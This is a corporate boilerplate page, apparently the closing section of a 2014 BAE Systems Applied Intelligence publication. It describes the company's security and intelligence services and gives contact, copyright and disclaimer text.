We deliver solutions which help our clients to protect and enhance their critical assets in the intelligence age. Our intelligent protection solutions combine large-scale data exploitation, ‘intelligence-grade’ security and complex services and solutions integration.

We operate in four key domains of expertise: cyber security, financial crime, communications intelligence and digital transformation.

Leading enterprises and government departments use our solutions to protect and enhance their physical infrastructure, mission-critical systems, valuable intellectual property, corporate information, reputation and customer relationships, competitive advantage and financial success.

We are part of BAE Systems, a global defence, aerospace and security company with approximately 90,000 employees. BAE Systems delivers a full range of products and services for air, land and naval forces, as well as advanced electronics, security, information technology solutions and customer support services.

For more information contact:

BAE Systems Applied Intelligence, Surrey Research Park, Guildford, Surrey GU2 7RQ, United Kingdom

T: +44 (0) 1483 816000 E: [email protected] W: www.baesystems.com/ai

Copyright © BAE Systems plc 2014. All rights reserved.

BAE SYSTEMS, the BAE SYSTEMS Logo and the product names referenced herein are trademarks of BAE Systems plc. BAE Systems Applied Intelligence Limited registered in England & Wales (No.1337451) with its registered office at Surrey Research Park, Guildford, England, GU2 7RQ. No part of this document may be copied, reproduced, adapted or redistributed in any form or by any means without the express prior written consent of BAE Systems Applied Intelligence.

This material is provided for general information purposes only. You should make your own judgement as regards use of this material and seek independent professional advice on your particular circumstances. Neither the publisher, nor the author, nor any contributors assume any liability to anyone for any loss or damage caused by any error or omission in the work, whether such error or omission is the result of negligence or any other cause.
